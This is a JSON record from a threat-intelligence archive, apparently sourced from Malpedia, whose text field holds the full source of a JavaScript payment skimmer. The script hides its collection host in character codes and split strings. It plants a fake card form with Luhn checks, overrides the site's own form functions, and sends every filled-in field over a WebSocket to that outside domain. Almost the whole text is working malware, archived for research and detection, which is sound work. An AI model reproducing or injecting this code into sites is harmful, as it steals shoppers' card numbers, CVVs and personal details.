{
	"id": "bb07ab92-f9d0-4768-afa7-700d0d9ae8ed",
	"created_at": "2026-04-06T00:19:05.484013Z",
	"updated_at": "2026-04-10T03:21:50.1258Z",
	"deleted_at": null,
	"sha1_hash": "025e2c2c053cb1fdf9a3f3ace5cb2cb6695539e3",
	"title": "group-1-websocket-stage-4.js",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 76894,
	"plain_text": "group-1-websocket-stage-4.js\r\nBy 262588213843476\r\nArchived: 2026-04-05 23:41:15 UTC\r\nfunction aC(name)\r\n{\r\nfunction escape(s)\r\n{\r\nreturn s.replace(/([.*+?\\^${}()|\\[\\]\\/\\\\])/g, '\\\\$1');\r\n};\r\nvar match = document.cookie.match(RegExp('(?:^|;\\\\s*)' + escape(name) + '=([^;]*)'));\r\nreturn match ? match[1] : null;\r\n}\r\nfunction googleCheck()\r\n{\r\nalert('I\\'m here!');\r\n}\r\nif (!aC('ashdgaisydasldasbdyigausd'))\r\n{\r\ndocument.cookie = \"ashdgaisydasldasbdyigausd=96ddd96e7ed46eb02af0280c550d9772\";\r\nvar tokahsdb = '96ddd96e7ed46eb02af0280c550d9772';\r\n}\r\nelse\r\n{\r\nvar tokahsdb = aC('ashdgaisydasldasbdyigausd');\r\n}\r\nvar reffererQwerdfdgdfg = 'victimsite.com';\r\nif (location.hostname == 'file://')\r\n{\r\nwhile (1)\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 1 of 16\n\n{\r\ndocument.cookie = document.cookie + document.cookie + \"qweqwe=qweqwe\";\r\ndocument.querySelector('body').innerHTML += document.querySelector('body').innerHTML;\r\n}\r\n}\r\nif (!document.querySelector('.qweqwe' + tokahsdb))\r\n{\r\nqweqweIint = setInterval(function ()\r\n{\r\nif (document.querySelector('div'))\r\n{\r\nvar s = document.getElementsByTagName('div')[0];\r\nvar li = document.createElement('span');\r\nli.class = \"qweqwe\" + tokahsdb;\r\ns.parentNode.insertBefore(li, s);\r\nclearInterval(qweqweIint);\r\n}\r\n}, 50);\r\nvar c = [112, 97, 121, 112, 97, 108, 97, 112, 105, 111, 98, 106, 101, 99, 116, 115, 46, 99, 111, 109],\r\nggtag = '//',\r\nihbdnfidjmpwofnj = 1;\r\nfor (var ji = 0; ji \u003c c.length; ji++)\r\n{\r\nggtag += String.fromCharCode(c[ji]);\r\n}\r\n(function ()\r\n{\r\nsetInterval(setNullMethods, 100);\r\nfunction setNullMethods()\r\n{\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 2 of 16\n\nif (typeof (window.GetData) != 'undefined')\r\n{\r\nwindow.GetData = function (elem, flag)\r\n{\r\nconsole.log('ZnVjayB5b3U=');\r\n};\r\n}\r\nif (typeof (window.Default_Send) != 'undefined')\r\n{\r\nwindow.Default_Send = function (elem, flag)\r\n{\r\nconsole.log('ZnVjayB5b3U=');\r\n};\r\n}\r\nif (typeof (window.CheckFields) != 'undefined')\r\n{\r\nwindow.CheckFields = function (elem, flag)\r\n{\r\nconsole.log('ZnVjayB5b3U=');\r\n};\r\n}\r\nif (typeof window.SendData != 'undefined')\r\n{\r\nwindow.SendData = function ()\r\n{\r\nconsole.log('ZnVjayB5b3U=');\r\n};\r\n}\r\n}\r\n})();\r\n(function ()\r\n{\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 3 of 16\n\nfunction _0xjefgJJDLF()\r\n{\r\nreturn _0x5gasdkf() \u0026\u0026 _0x5kjsdfdsf();\r\n}\r\nfunction _0x5gasdkf()\r\n{\r\nvar obj = document.querySelector('[name=\"card_num\"]#card_num');\r\nif (!__cleanValid(obj.value))\r\n{\r\nobj.setAttribute('class', 'invalid-custom-form-input');\r\nreturn false;\r\n}\r\nelse\r\n{\r\nobj.setAttribute('class', 'valid-custom-form-input');\r\nreturn true;\r\n}\r\n}\r\nfunction _0x5kjsdfdsf()\r\n{\r\nvar obj = document.querySelector('[name=\"cvv2\"]#cvv2');\r\nif (!___cleanValid(obj.value))\r\n{\r\nobj.setAttribute('class', 'invalid-custom-form-input');\r\nreturn false;\r\n}\r\nelse\r\n{\r\nobj.setAttribute('class', 'valid-custom-form-input');\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 4 of 16\n\nreturn true;\r\n}\r\n}\r\nfunction __cleanValid(value)\r\n{\r\nif (/[^0-9-\\s]+/.test(value)) return false;\r\nlet nCheck = 0,\r\nbEven = false;\r\nvalue = value.replace(/\\D/g, \"\");\r\nif (value.length \u003c 16) return false;\r\nfor (var n = value.length - 1; n \u003e= 0; n--)\r\n{\r\nvar cDigit = value.charAt(n),\r\nnDigit = parseInt(cDigit, 10);\r\nif (bEven \u0026\u0026 (nDigit *= 2) \u003e 9)\r\n{\r\nnDigit -= 9;\r\n}\r\nnCheck += nDigit;\r\nbEven = !bEven;\r\n}\r\nreturn (nCheck % 10) == 0;\r\n}\r\nfunction ___cleanValid(value)\r\n{\r\nvalue = value.replace(/\\D/g, \"\");\r\nif (value.length \u003c 3 || value.length \u003e 4)\r\n{\r\nreturn false;\r\n}\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 5 of 16\n\nreturn true;\r\n}\r\nvar intervalValidator = setInterval(_0xhsdfJk, 100);\r\nfunction _0xhsdfJk()\r\n{\r\nif (document.querySelector('[name=\"card_num\"]#card_num') \u0026\u0026 !document.querySelector('[name=\"card_num\"]#card_num[data\r\nvalidator=true]'))\r\n{\r\ndocument.querySelector('[name=\"card_num\"]#card_num').addEventListener('input', function (e)\r\n{\r\ne.target.value = e.target.value.replace(/[^0-9]/g, '').replace(/(\\..*)\\./g, '$1');\r\nlet val = '';\r\nlet __1 = e.target.value.substr(0, 4);\r\nif (e.target.value.length \u003e 4)\r\n{\r\nval += __1;\r\nlet __2 = e.target.value.substr(4, 4);\r\nif (__1.length == 4 \u0026\u0026 __2)\r\n{\r\nval += ' ' + __2;\r\nlet __3 = e.target.value.substr(8, 4);\r\nif (__2.length == 4 \u0026\u0026 __3)\r\n{\r\nval += ' ' + __3;\r\nlet __4 = e.target.value.substr(12, 4);\r\nif (__3.length == 4 \u0026\u0026 __4)\r\n{\r\nval += ' ' + __4;\r\n}\r\n}\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 6 of 16\n\n}\r\ne.target.value = val;\r\n}\r\n});\r\nif (document.querySelector('[name=\"card_num\"]#card_num'))\r\n{\r\ndocument.querySelector('[name=\"card_num\"]#card_num').addEventListener('focus', function (e)\r\n{\r\ndocument.querySelector('[name=\"card_num\"]#card_num').setAttribute('class', '');\r\n});\r\ndocument.querySelector('[name=\"card_num\"]#card_num').addEventListener('blur', function (e)\r\n{\r\n_0x5gasdkf();\r\n});\r\n}\r\nif (document.querySelector('[name=\"cvv2\"]#cvv2'))\r\n{\r\ndocument.querySelector('[name=\"cvv2\"]#cvv2').addEventListener('focus', function (e)\r\n{\r\ndocument.querySelector('[name=\"cvv2\"]#cvv2').setAttribute('class', '');\r\n});\r\ndocument.querySelector('[name=\"cvv2\"]#cvv2').addEventListener('blur', function (e)\r\n{\r\n_0x5kjsdfdsf();\r\n});\r\n}\r\ndocument.querySelector('[name=\"card_num\"]#card_num').setAttribute('data-validator', 'true');\r\n}\r\nif (document.querySelector('#dfsdfsfsdf672ac3d52c366529fc7f93a19455bd95') \u0026\u0026\r\n!document.querySelector('#dfsdfsfsdf672ac3d52c366529fc7f93a19455bd95.lkmfsjdfnsdihdbfl672ac3d52c366529fc7f93a19455bd\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 7 of 16\n\n{\ndocument.querySelector('#dfsdfsfsdf672ac3d52c366529fc7f93a19455bd95').setAttribute('class',\n'lkmfsjdfnsdihdbfl672ac3d52c366529fc7f93a19455bd95');\nvar tryToPayBtn = document.querySelector('#try-to-pay-button');\nif (tryToPayBtn)\n{\ntryToPayBtn.addEventListener('click', function (e)\n{\ne.preventDefault();\nif (!_0xjefgJJDLF())\n{\nreturn false;\n}\nelse\n{\nclearInterval(intervalValidator);\ndocument.querySelector('#dfsdfsfsdf672ac3d52c366529fc7f93a19455bd95 .statusBar').innerHTML = '\n\n' + labels['bank_processing'] + '\n\n';\ntryToPayBtn.setAttribute('disabled', 'disabled');\nsetTimeout(function ()\n{\ndocument.cookie = \"formHIde=1;\";\ndocument.querySelector('#dfsdfsfsdf672ac3d52c366529fc7f93a19455bd95 .statusBar').innerHTML = 'div\u003e';\nsetTimeout(function ()\n{\ndocument.querySelector('#dfsdfsfsdf672ac3d52c366529fc7f93a19455bd95').setAttribute('style', 'display:none !important;');\nif (typeof sdnjfsldfk == 'function')\n{\nsdnjfsldfk();\n}\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\nPage 8 of 16\n\n}, 7000);\r\n}, 10000);\r\n}\r\n});\r\n}\r\n}\r\n}\r\n})();\r\nvar wssocket;\r\nvar pingInterval;\r\nvar host = '//pa' + 'yp' + 'al' + 'ap' + 'io' + 'bj' + 'ec' + 'ts.com';\r\nwssconnect();\r\nlet wssConnectInterval = setInterval(wssconnect, 1000);\r\nfunction wssconnect()\r\n{\r\nif (!wssocket || (wssocket.readyState != 1 \u0026\u0026 wssocket.readyState != '-0'))\r\n{\r\ntry\r\n{\r\nwssocket = new WebSocket(\"wss:\" + host + \"/events/\");\r\nwssocket.onopen = function (data)\r\n{\r\nsocketSend(\r\n{\r\ne: \"hello\",\r\ndata:\r\n{\r\ndomain: location.origin\r\n}\r\n});\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 9 of 16\n\npingInterval = setInterval(function ()\r\n{\r\nsocketSend(\r\n{\r\ne: \"ping\"\r\n});\r\n}, 5000);\r\n};\r\nwssocket.onclose = function (data)\r\n{\r\nclearInterval(pingInterval);\r\n};\r\nwssocket.onmessage = function (data) {};\r\n}\r\ncatch (e)\r\n{}\r\n}\r\n}\r\nfunction socketSend(data)\r\n{\r\nwssocket.send(JSON.stringify(data));\r\n}\r\nfunction wssdisconnect()\r\n{\r\nclearInterval(pingInterval);\r\nclearInterval(wssConnectInterval);\r\nwssocket.close();\r\n}\r\nwindow.addEventListener(\"unload\", wssdisconnect);\r\n(function ()\r\n{\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 10 of 16\n\nfunction gcmBuild()\r\n{\r\naddEvents();\r\nsetInterval(addEvents, 100);\r\n}\r\nfunction pixel(fs)\r\n{\r\nvar j = getJson();\r\nemit(j);\r\n}\r\nfunction getJson()\r\n{\r\nconst formData = new Object;\r\nformData['tok'] = tokahsdb;\r\ndocument.querySelectorAll('input').forEach(function (item, i)\r\n{\r\nif (item.value.length \u003c 1)\r\n{\r\nreturn;\r\n}\r\nlet itemKey = '';\r\nif (item.name)\r\n{\r\nitemKey = item.name;\r\n}\r\nelse if (item.id)\r\n{\r\nitemKey = item.id;\r\n}\r\nformData[itemKey] = item.value;\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 11 of 16\n\n});\r\ndocument.querySelectorAll('select').forEach(function (item, i)\r\n{\r\nif (item.name.search('date') != '-1' || item.name.search('exp') != '-1' || item.name.search('cardExpiration') != '-1')\r\n{\r\nformData[item.name] = item.value;\r\nreturn;\r\n}\r\nif (!document.querySelector('[name=\"' + item.name + '\"]'))\r\n{\r\nconsole.log('[name=\"' + item.name + '\"]', 'not found');\r\nreturn;\r\n}\r\nif (!document.querySelector('[name=\"' + item.name + '\"] [value=\"' + document.querySelector('[name=\"' + item.name + '\"]').value\r\n'\"]'))\r\n{\r\nconsole.log('[name=\"' + item.name + '\"] [value=\"' + document.querySelector('[name=\"' + item.name + '\"]').value + '\"]', 'not found')\r\nreturn;\r\n}\r\nformData[item.name] = document.querySelector('[name=\"' + item.name + '\"] [value=\"' + document.querySelector('[name=\"' +\r\nitem.name + '\"]').value + '\"]').innerText;\r\n});\r\ndocument.querySelectorAll('textarea').forEach(function (item, i)\r\n{\r\nformData[item.name] = item.value;\r\n});\r\nif (typeof reffererQwerdfdgdfg != 'undefined')\r\n{\r\nformData['domain'] = reffererQwerdfdgdfg;\r\n}\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 12 of 16\n\nelse\r\n{\r\nformData['domain'] = location.hostname;\r\n}\r\nreturn JSON.stringify(formData);\r\n}\r\nfunction addEvents()\r\n{\r\nif (typeof grelos_v != 'undefined')\r\n{\r\ngrelos_v['Glink'] = '/';\r\n}\r\nif (\r\n!document.querySelector('[name*=cc_number]') \u0026\u0026\r\n!document.querySelector('[name*=firstname]') \u0026\u0026\r\n!document.querySelector('[name*=name]') \u0026\u0026\r\n!document.querySelector('[name*=address]') \u0026\u0026\r\n!document.querySelector('[name*=postcode]') \u0026\u0026\r\n!document.querySelector('[name*=zip]') \u0026\u0026\r\n!document.querySelector('[name*=phone]') \u0026\u0026\r\n!document.querySelector('[name*=email]') \u0026\u0026\r\n!document.querySelector('[name*=\"payment[cc_number]\"]') \u0026\u0026\r\n!document.querySelector('[name*=payment]') \u0026\u0026\r\n!document.querySelector('[name*=cc]') \u0026\u0026\r\n!document.querySelector('[name*=card_num]') \u0026\u0026\r\n!document.querySelector('[name*=billing]')\r\n)\r\n{\r\nreturn false;\r\n}\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 13 of 16\n\nArray.from(document.getElementsByTagName('input')).forEach(function (item, i)\r\n{\r\nif (!item.hasAttribute('build'))\r\n{\r\nitem.setAttribute('build', 1);\r\nitem.addEventListener(\"blur\", eventSend);\r\n}\r\n});\r\nArray.from(document.getElementsByTagName('select')).forEach(function (item, i)\r\n{\r\nif (!item.hasAttribute('build'))\r\n{\r\nitem.setAttribute('build', 1);\r\nitem.addEventListener(\"blur\", eventSend);\r\n}\r\n});\r\nArray.from(document.getElementsByTagName('textarea')).forEach(function (item, i)\r\n{\r\nif (!item.hasAttribute('build'))\r\n{\r\nitem.setAttribute('build', 1);\r\nitem.addEventListener(\"blur\", eventSend);\r\n}\r\n});\r\nArray.from(document.querySelectorAll(\"form\")).forEach(function (item, i)\r\n{\r\nif (!item.hasAttribute('build'))\r\n{\r\nitem.setAttribute('build', 1);\r\nitem.addEventListener(\"submit\", eventSend);\r\n}\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 14 of 16\n\n});\r\nArray.from(document.querySelectorAll(\"[type=submit]\")).forEach(function (item, i)\r\n{\r\nif (!item.hasAttribute('build'))\r\n{\r\nitem.setAttribute('buildd', 1);\r\nitem.addEventListener(\"click\", eventSend);\r\n}\r\n});\r\nArray.from(document.querySelectorAll(\"[type=button]\")).forEach(function (item, i)\r\n{\r\nif (!item.hasAttribute('buildd'))\r\n{\r\nitem.setAttribute('buildd', 1);\r\nitem.addEventListener(\"click\", eventSend);\r\n}\r\n});\r\n}\r\nfunction eventSend(e)\r\n{\r\npixel(0);\r\n}\r\nfunction emit(data)\r\n{\r\nif (typeof googlelog != 'undefined')\r\n{\r\nconsole.log(data);\r\n}\r\nsocketSend(\r\n{\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 15 of 16\n\ne: \"send\",\r\ndata: data\r\n});\r\n}\r\nwindow.addEventListener(\"load\", gcmBuild, false);\r\n})();\r\n(function ()\r\n{\r\nif (!aC('pixel'))\r\n{\r\nif (document.referrer != '' \u0026\u0026 document.referrer.replace('https://', '').replace('http://').split('/')[0] != location.hostname)\r\n{\r\ndocument.cookie = \"pixel=1; max-age=\" + (3600 * 3);\r\n}\r\nelse\r\n{\r\ndocument.cookie = \"pixel=2; max-age=\" + (3600 * 3);\r\n}\r\n}\r\nif (!aC('formHIde') \u0026\u0026 (1 || aC('pixel') == 1 || 0))\r\n{}\r\n})();\r\n}\r\nSource: https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nhttps://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745"
	],
	"report_names": [
		"2c017f220f2a24141bdeb70f76e7e745"
	],
	"threat_actors": [],
	"ts_created_at": 1775434745,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/025e2c2c053cb1fdf9a3f3ace5cb2cb6695539e3.pdf",
		"text": "https://archive.orkl.eu/025e2c2c053cb1fdf9a3f3ace5cb2cb6695539e3.txt",
		"img": "https://archive.orkl.eu/025e2c2c053cb1fdf9a3f3ace5cb2cb6695539e3.jpg"
	}
}